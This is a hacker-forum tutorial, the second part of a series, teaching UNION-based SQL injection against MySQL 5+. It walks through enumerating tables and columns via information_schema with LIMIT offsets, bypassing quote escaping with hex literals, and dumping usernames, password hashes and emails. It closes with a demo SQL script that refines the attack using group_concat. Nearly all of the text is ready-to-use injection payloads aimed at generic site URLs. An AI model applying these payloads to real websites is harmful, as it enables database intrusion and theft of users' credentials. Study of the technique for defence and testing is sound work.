SQL Injection [Part 2]



Okay, as I promised, I will post the tutorial about SQL injection for MySQL 5 and above.






Finding tables and columns for MySQL version 5 and above

For these versions we use information_schema, a built-in database (introduced in MySQL 5.0) whose tables describe every database, table and column the current MySQL user is allowed to see.

So, to get tables we will use the table_name column of information_schema.tables.

Example:
http://www.site.com/index.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

We replace the number 2 (the number that appeared on the screen earlier, i.e. the column whose value the page actually displays) with table_name, so the page prints the first table name from information_schema.tables.

Without LIMIT the query returns every table at once, but the page normally shows only one row, so we add LIMIT to the end of the query and step through the tables one at a time.

Note that in MySQL a LIMIT at the very end of a UNION applies to the whole combined result, not only to the injected SELECT. If the original query still returns the real row for id=5, that row occupies offset 0 and the table names start at offset 1; the offsets below assume the original row is not being returned.

Example:
http://www.site.com/index.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
* I put 0,1 because I want ONE result starting from offset 0 (the first row).

To view the second table, we change limit 0,1 to 1,1

Example:
http://www.site.com/index.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
The second table will be displayed. :)

To get the 3rd table, we put limit 2,1

Example:
http://www.site.com/index.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

We keep increasing the offset until something useful appears, such as db_admin, poll_user, auth, auth_user and so on. Be prepared for a lot of requests: the first entries are usually MySQL's own system tables rather than the application's.

This method can also be used to find column names :)

We will use the column_name column of information_schema.columns


The method is the same as above, so the example would be:
http://www.site.com/index.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column name will be displayed.

For the second column, change the limit from 0,1 to 1,1


Example:

http://www.site.com/index.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed :D
Keep incrementing until you get something like username, user, login, password, pass, passwd etc.



If you want to display the column names of one specific table, add a WHERE clause on table_name.

For example, once we have found the table for users:
http://www.site.com/index.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we get the column names of the table users; stepping through with LIMIT as before lists all of them. If the application escapes quote characters, the table name can be given as a hex string literal instead of a quoted string, since MySQL treats a 0x... literal as a string in a comparison (the same trick the 0x3a separator below relies on).


For example, if we found the columns user, pass and email, we use the concat() function again to put them all together in one displayed field, so the result looks nice. :)

*Please refer to my 1st post about SQLi if you have problems with that function :D


Example:

http://www.site.com/index.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*
(The UNION must supply the same number of columns as the original query, three here, and the comment opener /* at the end is the same as in the earlier queries.)

We get user:pass:email from the table users, one row per request (use LIMIT as above to step through further rows).

Example:
admin:hash:email@address.com
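
The whole procedure above as one added worked example, not code from the original post: a stand-alone MySQL (5.0 or later) script that runs the same information_schema queries against a constructed demo database. Everything named here is assumed: the database shop, the products and users tables with their rows, and a vulnerable page query of the form SELECT id,name,price FROM products WHERE id=<input> (three columns, column 2 displayed). It also goes slightly beyond the tutorial: it shows why a trailing LIMIT counts the original row, filters on table_schema=database() to skip MySQL's own tables, and uses group_concat() to list everything in one request instead of one LIMIT offset per request.

```sql
-- Added example, not from the original post. Assumed names: database `shop`,
-- tables `products` and `users`, and a vulnerable query of the form
-- SELECT id,name,price FROM products WHERE id=<input>. All rows are constructed.
CREATE DATABASE IF NOT EXISTS shop;
USE shop;
CREATE TABLE products (id INT, name VARCHAR(64), price DECIMAL(8,2));
CREATE TABLE users (id INT, user VARCHAR(32), pass VARCHAR(64), email VARCHAR(64));
INSERT INTO products VALUES (5, 'widget', 9.99);
-- constructed sample credential row (the hash is md5('password'))
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin@example.com');

-- Step 1: the page's query with the tutorial's payload appended.
-- In MySQL a LIMIT at the end of a UNION applies to the whole combined result,
-- so while the real row for id=5 is still returned, LIMIT 0,1 hands back that
-- product row rather than the first table name.
SELECT id,name,price FROM products WHERE id=5
UNION ALL SELECT 1,table_name,3 FROM information_schema.tables LIMIT 0,1;

-- Suppressing the original row (no product has id -5) puts the first
-- information_schema row at offset 0, which is what the tutorial's LIMIT
-- counting assumes. Unfiltered, the early offsets are MySQL's own tables.
SELECT id,name,price FROM products WHERE id=-5
UNION ALL SELECT 1,table_name,3 FROM information_schema.tables LIMIT 0,1;

-- Restricting to the current database skips the system tables, and
-- GROUP_CONCAT returns every table name in a single displayed field
-- (the ORDER BY inside it makes the list deterministic).
SELECT id,name,price FROM products WHERE id=-5
UNION ALL SELECT 1,GROUP_CONCAT(table_name ORDER BY table_name),3
  FROM information_schema.tables WHERE table_schema=DATABASE();

-- Step 2: the columns of the interesting table. 0x7573657273 is 'users' as a
-- hex string literal, which avoids quote characters if the application
-- escapes them; ordinal_position keeps the columns in table order.
SELECT id,name,price FROM products WHERE id=-5
UNION ALL SELECT 1,GROUP_CONCAT(column_name ORDER BY ordinal_position),3
  FROM information_schema.columns
  WHERE table_name=0x7573657273 AND table_schema=DATABASE();

-- Step 3: dump the rows, joining the fields with 0x3a (a ':' character),
-- with the column count matching the original three-column SELECT.
SELECT id,name,price FROM products WHERE id=-5
UNION ALL SELECT 1,CONCAT(user,0x3a,pass,0x3a,email),3 FROM users;

-- Clean up the constructed demo database.
DROP DATABASE shop;
```

Run it in the mysql client as a user allowed to create a database; each SELECT is the full statement the server would execute when the corresponding payload is injected, with the trailing /* from the URLs left out because the script has nothing after the payload to comment away.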


That's all my tutorial for this time. Hope this might be helpful :)



By Black Eagle